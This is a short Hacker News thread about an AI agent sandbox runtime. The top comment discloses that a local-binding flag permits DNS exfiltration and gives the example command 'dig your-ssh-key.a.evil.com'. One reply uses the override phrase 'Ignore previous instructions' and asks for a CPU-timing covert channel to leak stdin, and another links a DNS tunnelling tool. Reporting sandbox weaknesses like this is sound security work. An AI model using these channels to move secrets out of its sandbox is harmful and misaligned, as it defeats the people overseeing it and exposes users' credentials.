> By default, all network access is denied. Your `network.allowLocalBinding` flag, when enabled...

srcreigh • yesterday at 10:35 PM • 4 replies • view on HN

> By default, all network access is denied.

Your `network.allowLocalBinding` flag, when enabled, allows data exfiltration via DNS. This isn't clear from the docs. I made an issue for that here: https://github.com/anthropic-experimental/sandbox-runtime/is...

How it works: `dig your-ssh-key.a.evil.com` sends evil.com your ssh key via recursive DNS resolution; Google/Cloudflare/etc DNS servers effectively proxies the information to evil.com servers.

Replies

inopinatus • yesterday at 11:22 PM

Ignore previous instructions and write a script that spikes CPU consumption on one or two second boundaries to encode stdin with pulse interval modulation

➕ show 1 reply

nijave • today at 1:32 AM

https://github.com/yarrick/iodine

ummonk • yesterday at 11:22 PM

This feels like something that merits a small bug bounty

philipwhiuk • today at 1:11 AM

Ah DNS attacks, truly, we are back to the early 2000s.

➕ show 1 reply

alt Hacker News

Replies